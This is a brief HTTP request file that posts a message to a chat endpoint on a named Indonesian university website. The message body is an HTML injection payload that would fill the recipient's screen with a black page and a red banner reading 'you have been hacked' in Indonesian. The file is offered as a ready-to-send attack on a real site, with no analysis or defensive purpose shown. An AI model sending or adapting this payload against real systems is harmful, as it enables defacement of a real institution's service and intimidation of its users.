###
POST https://simak.unpak.ac.id/chat.php?action=sendchat
Content-Type: application/json

{
    "to": "ilmukomputer",
    "message": "<div style='width: 100%; height: 100vh;background-color: black; display: flex; justify-content: center; align-items: center;'><h1 style='color: red;'>KAMU TELAH KENA HACK!!!</h1></div>"
}